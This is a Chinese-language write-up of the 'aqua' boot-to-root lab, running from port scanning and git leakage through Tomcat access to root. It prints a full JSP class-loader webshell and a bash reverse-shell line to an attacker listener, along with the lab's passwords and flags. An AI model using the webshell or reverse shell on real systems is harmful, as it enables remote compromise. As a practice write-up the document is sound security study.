aqua

aqua

扫一下看看能不能扫得到：

看来是可以进行操作的！

信息搜集

端口扫描

nmap -Pn 10.160.78.89

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8009/tcp open  ajp13
8080/tcp open  http-proxy

nmap -sT -T4 -sV -p- 10.160.78.89

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat 8.5.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录爆破

既然开启了80端口，自然是可以进行目录扫描的：

gobuster dir -u http://10.160.78.89/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html.png,jpg

/.php                 (Status: 403) [Size: 277]
/.html.png            (Status: 403) [Size: 277]
/img                  (Status: 301) [Size: 310] [--> http://10.160.78.89/img/]
/css                  (Status: 301) [Size: 310] [--> http://10.160.78.89/css/]
/robots.txt           (Status: 200) [Size: 33]
/.php                 (Status: 403) [Size: 277]
/.html.png            (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]

漏洞挖掘

查看敏感目录

主页是这样的：

查看一下robots.txt：

User-Agent: *
Disalow: /SuperCMS

放大以后是这么个玩意，嘶。

<!DOCTYPE html>
<html>
        <head>
                <meta charset="utf-8">
                <title>aquaMan</title>
                <link href="https://fonts.googleapis.com/css?family=Lobster" rel="stylesheet">
        </head>
    <body background="img/img.jpg">
    </body>
<style>
        body {
                width: 100%;
                height:100%;
        }
</style>
</html>

查看是否图片隐写

下载下来看一下：

wget https://fonts.googleapis.com/css?family=Lobster
file css\?family=Lobster                                    
# css?family=Lobster: ASCII text
cat css\?family=Lobster
# @font-face {
#   font-family: 'Lobster';
#   font-style: normal;
#   font-weight: 400;
#   src: url(https://fonts.gstatic.com/s/lobster/v30/neILzCirqoswsqX9zoKmNg.ttf) format('truetype');
# }
wget https://fonts.gstatic.com/s/lobster/v30/neILzCirqoswsqX9zoKmNg.ttf
# neILzCirqoswsqX9zoKmNg.ttf: TrueType Font data, 17 tables, 1st "GDEF", 8 names, Microsoft, language 0x409

看来多虑了，下载图片：

发现确实没有东西，额，白忙活。

base64解码隐藏信息

打开源码的时候注意到在贼下面有东西：

MT0yID0gcGFzc3dvcmRfemlwCg==
echo "MT0yID0gcGFzc3dvcmRfemlwCg==" | base64 -d 
# 1=2 = password_zip

查看主页得知：

agua(1) = H2O(2) = password_zip

尝试查看是否有这个目录，但是都没有发现，尝试ssh登录也没有成功。

检查8009，8080端口

额，查看一下Tomcat 8.5.5是否存在远程命令执行的漏洞：

没啥发现，看来不是从这个方向搞的。

二次信息搜集

gobuster dir -u http://10.160.78.89/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html.png,jpg,zip

/.html.png            (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/img                  (Status: 301) [Size: 310] [--> http://10.160.78.89/img/]
/css                  (Status: 301) [Size: 310] [--> http://10.160.78.89/css/]
/robots.txt           (Status: 200) [Size: 33]
/.php                 (Status: 403) [Size: 277]
/.html.png            (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]

我还以为遗漏了zip文件呢！

sudo dirsearch -u http://10.160.78.89/SuperCMS/ -e* 2>/dev/null

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25
Wordlist size: 14594

Output File: /home/kali/temp/reports/http_10.160.78.89/_SuperCMS__24-03-22_01-45-39.txt

Target: http://10.160.78.89/

[01:45:39] Starting: SuperCMS/
[01:45:39] 301 -  318B  - /SuperCMS/js  ->  http://10.160.78.89/SuperCMS/js/
[01:45:40] 301 -  320B  - /SuperCMS/.git  ->  http://10.160.78.89/SuperCMS/.git/
[01:45:40] 200 -  420B  - /SuperCMS/.git/branches/
[01:45:40] 200 -  607B  - /SuperCMS/.git/
[01:45:40] 200 -  645B  - /SuperCMS/.git/hooks/
[01:45:40] 200 -  240B  - /SuperCMS/.git/info/exclude
[01:45:40] 200 -  466B  - /SuperCMS/.git/info/
[01:45:40] 200 -  257B  - /SuperCMS/.git/config
[01:45:40] 200 -   21B  - /SuperCMS/.git/HEAD
[01:45:40] 200 -  488B  - /SuperCMS/.git/logs/
[01:45:40] 301 -  330B  - /SuperCMS/.git/logs/refs  ->  http://10.160.78.89/SuperCMS/.git/logs/refs/
[01:45:40] 301 -  336B  - /SuperCMS/.git/logs/refs/heads  ->  http://10.160.78.89/SuperCMS/.git/logs/refs/heads/
[01:45:40] 200 -   73B  - /SuperCMS/.git/description
[01:45:40] 200 -  620B  - /SuperCMS/.git/index
[01:45:40] 301 -  338B  - /SuperCMS/.git/logs/refs/remotes  ->  http://10.160.78.89/SuperCMS/.git/logs/refs/remotes/
[01:45:40] 200 -  176B  - /SuperCMS/.git/logs/refs/remotes/origin/HEAD
[01:45:40] 200 -  112B  - /SuperCMS/.git/packed-refs
[01:45:40] 200 -  480B  - /SuperCMS/.git/refs/
[01:45:40] 301 -  331B  - /SuperCMS/.git/refs/heads  ->  http://10.160.78.89/SuperCMS/.git/refs/heads/
[01:45:40] 301 -  340B  - /SuperCMS/.git/refs/remotes/origin  ->  http://10.160.78.89/SuperCMS/.git/refs/remotes/origin/
[01:45:40] 200 -  659B  - /SuperCMS/.git/objects/
[01:45:40] 200 -   30B  - /SuperCMS/.git/refs/remotes/origin/HEAD
[01:45:40] 301 -  345B  - /SuperCMS/.git/logs/refs/remotes/origin  ->  http://10.160.78.89/SuperCMS/.git/logs/refs/remotes/origin/
[01:45:40] 301 -  330B  - /SuperCMS/.git/refs/tags  ->  http://10.160.78.89/SuperCMS/.git/refs/tags/
[01:45:40] 301 -  333B  - /SuperCMS/.git/refs/remotes  ->  http://10.160.78.89/SuperCMS/.git/refs/remotes/
[01:45:40] 200 -  176B  - /SuperCMS/.git/logs/HEAD
[01:45:40] 403 -  277B  - /SuperCMS/.htaccess.bak1
[01:45:40] 403 -  277B  - /SuperCMS/.ht_wsr.txt
[01:45:40] 403 -  277B  - /SuperCMS/.htaccess.orig
[01:45:40] 403 -  277B  - /SuperCMS/.htaccess.save
[01:45:40] 403 -  277B  - /SuperCMS/.htaccess_extra
[01:45:40] 403 -  277B  - /SuperCMS/.htaccess_orig
[01:45:40] 403 -  277B  - /SuperCMS/.htaccess.sample
[01:45:40] 403 -  277B  - /SuperCMS/.htaccessOLD2
[01:45:40] 403 -  277B  - /SuperCMS/.htm
[01:45:40] 403 -  277B  - /SuperCMS/.htpasswd_test
[01:45:40] 403 -  277B  - /SuperCMS/.htpasswds
[01:45:40] 403 -  277B  - /SuperCMS/.html
[01:45:40] 403 -  277B  - /SuperCMS/.htaccessOLD
[01:45:40] 403 -  277B  - /SuperCMS/.httr-oauth
[01:45:40] 403 -  277B  - /SuperCMS/.htaccessBAK
[01:45:40] 403 -  277B  - /SuperCMS/.htaccess_sc
[01:45:41] 403 -  277B  - /SuperCMS/.php
[01:46:00] 301 -  319B  - /SuperCMS/css  ->  http://10.160.78.89/SuperCMS/css/
[01:46:06] 301 -  319B  - /SuperCMS/img  ->  http://10.160.78.89/SuperCMS/img/
[01:46:08] 200 -  464B  - /SuperCMS/js/
[01:46:09] 200 -  779B  - /SuperCMS/login.html
[01:46:20] 200 -   37B  - /SuperCMS/README.md

Task Completed

我擦居然没有扫出来git泄露！

git泄露

python2 GitHack.py http://10.160.78.89/SuperCMS/.git/

再恢复一下：

找到knock的端口号了！

使用knock敲一下三个端口：

knock 10.160.78.89 1100 800 666 -v
# hitting tcp 10.160.78.89:1100
# hitting tcp 10.160.78.89:800
# hitting tcp 10.160.78.89:666

重新扫描一下：

nmap 10.160.78.89 -sC -sV

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.160.78.86
|      Logged in as ftp
|      TYPE: ASCII
|      Session bandwidth limit in byte/s is 1048576
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Jun 30  2021 pub
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 00:11:32:04:42:e0:7f:98:29:7c:1c:2a:b8:a7:b0:4a (RSA)
|   256 9c:92:93:eb:1c:8f:84:c8:73:af:ed:3b:65:09:e4:89 (ECDSA)
|_  256 a8:5b:df:d0:7e:31:18:6e:57:e7:dd:6b:d5:89:44:98 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Todo sobre el Agua
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http    Apache Tomcat 8.5.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/8.5.5
|_http-favicon: Apache Tomcat
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

ftp连接

ftp 10.160.78.89

# Connected to 10.160.78.89.
# 220 (vsFTPd 3.0.3)
Name (10.160.78.89:kali): Anonymous
# 331 Please specify the password.
Password: 
# 230 Login successful.
# Remote system type is UNIX.
# Using binary mode to transfer files.
ftp> dir
# 229 Entering Extended Passive Mode (|||45158|)
# 150 Here comes the directory listing.
# drwxr-xr-x    2 0        0            4096 Jun 30  2021 pub
# 226 Directory send OK.
ftp> cd pub
# 250 Directory successfully changed.
ftp> dir
# 229 Entering Extended Passive Mode (|||51104|)
# 150 Here comes the directory listing.
# 226 Directory send OK.
ftp> ls -la
# 229 Entering Extended Passive Mode (|||64886|)
# 150 Here comes the directory listing.
# drwxr-xr-x    2 0        0            4096 Jun 30  2021 .
# drwxr-xr-x    3 0        0            4096 Feb 03  2021 ..
# -rw-r--r--    1 0        0            1250 Feb 03  2021 .backup.zip
# 226 Directory send OK.
ftp> get .backup.zip
# local: .backup.zip remote: .backup.zip
# 229 Entering Extended Passive Mode (|||54042|)
# 150 Opening BINARY mode data connection for .backup.zip (1250 bytes).
# 100% |**************************************************************************|  1250       20.91 MiB/s    00:00 ETA
# 226 Transfer complete.
# 1250 bytes received in 00:00 (5.49 MiB/s)

解压一下：

unzip .backup.zip
# Archive:  .backup.zip
#    skipping: tomcat-users.xml        need PK compat. v5.1 (can do v4.6)

参考网上的解答，发现得使用7z进行解压缩

sudo apt-get install p7zip-full

解压失败了，需要密码，想起之前的那个了1=2=xxx，尝试一下：

aqua=H2O
aqua
H2O

发现都不对，查一下是不是使用哪里有问题，没问题啊，回去重新看了一下，发现密码写错了

agua=H2O
agua
H2O

都试一下，发现密码是agua=H2O：

给了账号密码。

登录tomcat

aquaMan
P4st3lM4n

进入后台了，想起之前搜集漏洞的时候发现这个版本存在JSP上传的漏洞，尝试上传一下AntSword连接的JSP木马：

// exp.jsp
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("hack");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

上传时候发现：

看一下这个文件是啥东西：

压缩以后，修改后缀名再次上传：

可以看到已经上传成功了，尝试连接一下：

提权

弹一个反向shell

bash -c 'exec bash -i &>/dev/tcp/10.160.78.86/1234 <&1'

nc -lvnp 1234

搜集基础信息

tomcat@Atlantis:/$ find / -perm -u=s -type f 2>/dev/null
# find / -perm -u=s -type f 2>/dev/null
# /bin/mount
# /bin/umount
# /bin/su
# /bin/ping
# /bin/fusermount
# /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
# /usr/lib/policykit-1/polkit-agent-helper-1
# /usr/lib/dbus-1.0/dbus-daemon-launch-helper
# /usr/lib/eject/dmcrypt-get-device
# /usr/lib/openssh/ssh-keysign
# /usr/lib/snapd/snap-confine
# /usr/bin/newgrp
# /usr/bin/newgidmap
# /usr/bin/chfn
# /usr/bin/newuidmap
# /usr/bin/passwd
# /usr/bin/traceroute6.iputils
# /usr/bin/at
# /usr/bin/sudo
# /usr/bin/chsh
# /usr/bin/gpasswd
tomcat@Atlantis:/$ echo $PATH
# echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
tomcat@Atlantis:/$ cat /etc/cron* 
# cat /etc/cron*
# cat: /etc/cron.d: Is a directory
# cat: /etc/cron.daily: Is a directory
# cat: /etc/cron.hourly: Is a directory
# cat: /etc/cron.monthly: Is a directory
# cat: /etc/cron.weekly: Is a directory
# # /etc/crontab: system-wide crontab
# # Unlike any other crontab you don't have to run the `crontab'
# # command to install the new version when you edit this file
# # and files in /etc/cron.d. These files also have username fields,
# # that none of the other crontabs do.

# SHELL=/bin/sh
# PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# # m h dom mon dow user  command
# 17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
# 25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
# 47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
# 52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# #
tomcat@Atlantis:/$ cat /etc/passwd
# cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# bin:x:2:2:bin:/bin:/usr/sbin/nologin
# sys:x:3:3:sys:/dev:/usr/sbin/nologin
# sync:x:4:65534:sync:/bin:/bin/sync
# games:x:5:60:games:/usr/games:/usr/sbin/nologin
# man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
# lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
# mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
# news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
# uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
# proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
# www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
# backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
# list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
# irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
# gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
# nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
# systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
# systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
# syslog:x:102:106::/home/syslog:/usr/sbin/nologin
# messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
# _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
# lxd:x:105:65534::/var/lib/lxd/:/bin/false
# uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
# dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
# landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
# pollinate:x:109:1::/var/cache/pollinate:/bin/false
# sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
# tridente:x:1000:1000:Poseidon Perez,,,:/home/tridente:/bin/bash
# ftp:x:111:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
# tomcat:x:1001:1001::/opt/tomcat:/bin/false
# memcache:x:112:115:Memcached,,,:/nonexistent:/bin/false

tomcat@Atlantis:/$ ps aux
# 就写找的可能有用的了
# memcache   840  0.0  0.3 425800  3736 ?        Ssl  04:45   0:05 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1
# root       852  0.0  0.7  32968  7308 ?        Ss   04:45   0:00 /usr/bin/python /root/server.py

连接memcache服务

tomcat@Atlantis:/$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
?
# ERROR
help
# ERROR
stats
# STAT pid 840
# STAT uptime 9762
# STAT time 1711092481
# STAT version 1.5.6 Ubuntu
# STAT libevent 2.1.8-stable
# STAT pointer_size 64
# STAT rusage_user 1.648555
# STAT rusage_system 3.647246
# STAT max_connections 1024
# STAT curr_connections 1
# STAT total_connections 7811
# STAT rejected_connections 0
# STAT connection_structures 3
# STAT reserved_fds 20
# STAT cmd_get 0
# STAT cmd_set 39045
# STAT cmd_flush 0
# STAT cmd_touch 0
# STAT get_hits 0
# STAT get_misses 0
# STAT get_expired 0
# STAT get_flushed 0
# STAT delete_misses 0
# STAT delete_hits 0
# STAT incr_misses 0
# STAT incr_hits 0
# STAT decr_misses 0
# STAT decr_hits 0
# STAT cas_misses 0
# STAT cas_hits 0
# STAT cas_badval 0
# STAT touch_hits 0
# STAT touch_misses 0
# STAT auth_cmds 0
# STAT auth_errors 0
# STAT bytes_read 1304119
# STAT bytes_written 312374
# STAT limit_maxbytes 67108864
# STAT accepting_conns 1
# STAT listen_disabled_num 0
# STAT time_in_listen_disabled_us 0
# STAT threads 4
# STAT conn_yields 0
# STAT hash_power_level 16
# STAT hash_bytes 524288
# STAT hash_is_expanding 0
# STAT slab_reassign_rescues 0
# STAT slab_reassign_chunk_rescues 0
# STAT slab_reassign_evictions_nomem 0
# STAT slab_reassign_inline_reclaim 0
# STAT slab_reassign_busy_items 0
# STAT slab_reassign_busy_deletes 0
# STAT slab_reassign_running 0
# STAT slabs_moved 0
# STAT lru_crawler_running 0
# STAT lru_crawler_starts 4590
# STAT lru_maintainer_juggles 113621
# STAT malloc_fails 0
# STAT log_worker_dropped 0
# STAT log_worker_written 0
# STAT log_watcher_skipped 0
# STAT log_watcher_sent 0
# STAT bytes 383
# STAT curr_items 5
# STAT total_items 39045
# STAT slab_global_page_pool 0
# STAT expired_unfetched 0
# STAT evicted_unfetched 0
# STAT evicted_active 0
# STAT evictions 0
# STAT reclaimed 0
# STAT crawler_reclaimed 0
# STAT crawler_items_checked 68
# STAT lrutail_reflocked 0
# STAT moves_to_cold 39044
# STAT moves_to_warm 0
# STAT moves_within_lru 0
# STAT direct_reclaims 0
# STAT lru_bumps_dropped 0
# END
stats cachedump 1 5
# ITEM email [17 b; 0 s]
# ITEM Name [14 b; 0 s]
# ITEM password [18 b; 0 s]
# ITEM username [8 b; 0 s]
# END
get username
# VALUE username 0 8
# tridente
# END
get password
# VALUE password 0 18
# N3ptun0D10sd3lM4r$
# END

ssh登录tridente

ssh tridente@10.160.78.89
N3ptun0D10sd3lM4r$

信息搜集

tridente@Atlantis:~$ sudo -l
[sudo] password for tridente: 
Matching Defaults entries for tridente on Atlantis:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tridente may run the following commands on Atlantis:
    (root) /home/tridente/find

利用特权+find提权

https://gtfobins.github.io/gtfobins/find/

尝试利用：

f506a6ee37275430ac07caa95914aeba

john爆破gpg密码获取flag

将加密的 root 文件下载到本机：

python3 -m http.server 8888
wget http://10.160.78.89:8888/root.txt.gpg

尝试使用john爆破一下：

gpg2john root.txt.gpg > flag_hash
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
john flag_hash -w=/usr/share/wordlists/rockyou.txt

(virtualbox的kali没搞过这个字典）

爆破出来了密码：

arthur

使用这个密码对gpg文件进行解密：

gpg root.txt.gpg

输入密码进行解密：

获取到了flag！

e16957fbc9202932b1dc7fe3e10a197e